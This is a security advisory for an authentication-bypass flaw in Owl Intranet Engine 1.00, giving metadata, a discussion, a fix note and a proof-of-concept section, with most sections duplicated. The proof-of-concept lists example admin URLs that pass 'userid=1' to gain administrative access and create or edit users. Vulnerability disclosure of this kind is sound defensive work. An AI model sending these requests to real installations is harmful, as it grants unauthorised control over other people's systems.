Owl Intranet Engine 'userid' Parameter Authentication Bypass Vulnerability
BID:51076
Info
Owl Intranet Engine 'userid' Parameter Authentication Bypass Vulnerability
| Bugtraq ID: | 51076 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 15 2011 12:00AM |
| Updated: | Dec 15 2011 12:00AM |
| Credit: | RedTeam Pentesting GmbH |
| Vulnerable: |
Owl Intranet Engine Owl Intranet Engine 1.00 |
| Not Vulnerable: |
Owl Intranet Engine Owl Intranet Engine 1.01 |
Discussion
Owl Intranet Engine 'userid' Parameter Authentication Bypass Vulnerability
Owl Intranet Engine is prone to an authentication-bypass vulnerability.
An attacker can exploit this issue to bypass the authentication process and gain administrative access to the application.
Owl Intranet Engine 1.00 is affected; other versions may also be vulnerable.
Owl Intranet Engine is prone to an authentication-bypass vulnerability.
An attacker can exploit this issue to bypass the authentication process and gain administrative access to the application.
Owl Intranet Engine 1.00 is affected; other versions may also be vulnerable.
Exploit / POC
Owl Intranet Engine 'userid' Parameter Authentication Bypass Vulnerability
An attacker can use readily available tools to exploit this issue.
The following example URIs are available:
http://www.example.org/owl/admin/index.php?userid=1
http://www.example.org/owl/admin/index.php?userid=1&newuser
http://www.example.org/owl/admin/index.php?userid=1&action=edituser&owluser=1
An attacker can use readily available tools to exploit this issue.
The following example URIs are available:
http://www.example.org/owl/admin/index.php?userid=1
http://www.example.org/owl/admin/index.php?userid=1&newuser
http://www.example.org/owl/admin/index.php?userid=1&action=edituser&owluser=1
Solution / Fix
Owl Intranet Engine 'userid' Parameter Authentication Bypass Vulnerability
Solution:
Reportedly, the vendor has fixed the issue but Symantec has not confirmed it. Please contact the vendor for more information.
Solution:
Reportedly, the vendor has fixed the issue but Symantec has not confirmed it. Please contact the vendor for more information.
References
Owl Intranet Engine 'userid' Parameter Authentication Bypass Vulnerability
References:
References:
- Owl Intranet Engine Homepage (Owl Intranet Engine)
- Owl Intranet Engine: Authentication Bypass (Owl Intranet Engine)